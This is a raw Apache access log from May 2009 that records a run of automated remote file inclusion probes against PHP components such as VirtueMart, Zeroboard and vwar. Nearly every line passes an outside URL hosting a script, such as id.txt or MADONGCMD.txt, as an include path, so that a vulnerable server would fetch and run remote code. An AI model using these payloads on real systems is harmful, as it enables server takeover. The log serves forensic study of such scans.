89.108.84.112 - - [14/May/2009:21:21:28 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 339 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.11 - - [14/May/2009:21:22:21 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
77.221.130.11 - - [14/May/2009:21:22:21 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
216.120.237.150 - - [14/May/2009:21:22:23 -0500] "GET /errors.php?error=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
216.120.237.150 - - [14/May/2009:21:22:23 -0500] "GET /logs/errors.php?error=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
218.249.36.194 - - [14/May/2009:21:22:50 -0500] "GET //include/admin.lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:21:22:50 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:21:22:50 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:21:22:50 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:23:12 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:23:12 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:25:04 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:25:04 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:25:04 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:21:25:16 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:21:25:17 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
221.157.225.65 - - [14/May/2009:21:26:02 -0500] "GET /logs//prog/pl_menu/show_path.php?GLOBALS[binn_include_path]=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:21:26:02 -0500] "GET //prog/pl_menu/show_path.php?GLOBALS[binn_include_path]=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:21:26:02 -0500] "GET /logs/access_log.1240531200//prog/pl_menu/show_path.php?GLOBALS[binn_include_path]=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:21:26:02 -0500] "GET /logs/access_log.1239408000//prog/pl_menu/show_path.php?GLOBALS[binn_include_path]=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:27:46 -0500] "GET /logs/access_log.1228608000//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:27:46 -0500] "GET //?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:27:46 -0500] "GET /logs/access_log.1228608000//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:27:46 -0500] "GET //?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:27:48 -0500] "GET /logs//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 200 189449 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:27:48 -0500] "GET /logs//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 200 189449 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:21:29:02 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:21:29:03 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
65.55.106.155 - - [14/May/2009:21:30:01 -0500] "GET /logs/access_log.1109116800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.32.100.130 - - [14/May/2009:21:30:10 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:21:30:10 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
123.143.98.5 - - [14/May/2009:21:30:50 -0500] "GET /logs/access_log.1228608000%20%20//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:21:31:20 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:21:31:20 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
123.143.98.5 - - [14/May/2009:21:31:23 -0500] "GET /logs/access_log.1228608000%20%20//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.248.128.84 - - [14/May/2009:21:33:36 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
69.248.128.84 - - [14/May/2009:21:33:36 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
213.171.225.234 - - [14/May/2009:21:34:14 -0500] "GET /logs/index.php?css_path=http://www.cerigua.org/cp/scripts/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.171.225.234 - - [14/May/2009:21:34:14 -0500] "GET /index.php?css_path=http://www.cerigua.org/cp/scripts/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
69.248.128.84 - - [14/May/2009:21:34:24 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
69.248.128.84 - - [14/May/2009:21:34:29 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
211.110.19.24 - - [14/May/2009:21:42:09 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.110.19.24 - - [14/May/2009:21:42:09 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.110.19.24 - - [14/May/2009:21:42:09 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:21:42:37 -0500] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:21:42:37 -0500] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.32.210.206 - - [14/May/2009:21:42:37 -0500] "GET /logs/access_log.1238544000///index.php?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:21:42:40 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:21:42:40 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
123.143.98.5 - - [14/May/2009:21:43:00 -0500] "GET /logs/access_log.1237075200//?_zb_path=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:21:43:45 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:21:43:45 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:21:44:04 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:21:44:04 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:21:44:10 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:21:44:12 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
61.160.201.12 - - [14/May/2009:21:44:34 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:21:44:34 -0500] "GET /logs/access_log.1239235200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:21:44:37 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:21:46:03 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:21:46:03 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:21:46:03 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:21:46:03 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:21:46:40 -0500] "GET /logs/access_log.1153872000 HTTP/1.1" 200 325 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.59.11.66 - - [14/May/2009:21:47:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:47:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:47:08 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:47:13 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:21:47:27 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:21:47:28 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
69.172.92.14 - - [14/May/2009:21:48:15 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:21:48:15 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
199.120.90.222 - - [14/May/2009:21:48:21 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:21:48:22 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:21:48:27 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:21:48:27 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.110.19.24 - - [14/May/2009:21:48:52 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.110.19.24 - - [14/May/2009:21:48:52 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.110.19.24 - - [14/May/2009:21:48:52 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.110.19.24 - - [14/May/2009:21:48:52 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
199.120.90.222 - - [14/May/2009:21:48:53 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [14/May/2009:21:48:53 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.18.76.16 - - [14/May/2009:21:49:54 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:21:49:54 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
209.172.33.230 - - [14/May/2009:21:50:07 -0500] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
209.172.33.230 - - [14/May/2009:21:50:07 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.172.33.230 - - [14/May/2009:21:50:07 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
171.64.75.45 - - [14/May/2009:21:50:07 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
171.64.75.45 - - [14/May/2009:21:50:07 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
171.64.75.45 - - [14/May/2009:21:50:07 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
199.120.90.222 - - [14/May/2009:21:50:10 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:21:50:10 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
209.172.33.230 - - [14/May/2009:21:50:13 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
171.64.75.45 - - [14/May/2009:21:50:13 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
199.120.90.222 - - [14/May/2009:21:50:20 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:21:50:20 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
171.64.75.45 - - [14/May/2009:21:51:35 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.arylia.com/banners/93/yes.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:21:51:35 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.arylia.com/banners/93/yes.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
212.59.11.66 - - [14/May/2009:21:52:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:52:08 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:21:52:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.172.92.14 - - [14/May/2009:21:52:10 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:21:52:10 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
212.59.11.66 - - [14/May/2009:21:52:18 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:21:52:39 -0500] "GET /logs/access_log.1240531200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:21:52:39 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:21:52:39 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:21:52:52 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:21:53:27 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:21:53:28 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
124.0.54.98 - - [14/May/2009:21:54:25 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:21:54:25 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:21:54:25 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:21:54:30 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.172.92.14 - - [14/May/2009:21:56:55 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.92.14 - - [14/May/2009:21:56:55 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
122.153.212.195 - - [14/May/2009:21:57:17 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:21:57:22 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:21:57:25 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:21:57:30 -0500] "GET //ask_password.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:21:57:30 -0500] "GET /logs/access_log.1231718400//ask_password.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:21:57:30 -0500] "GET /logs//ask_password.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:21:57:33 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:21:57:56 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:21:57:56 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
221.157.225.65 - - [14/May/2009:21:58:26 -0500] "GET /logs/access_log.1233964800//ask_password.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
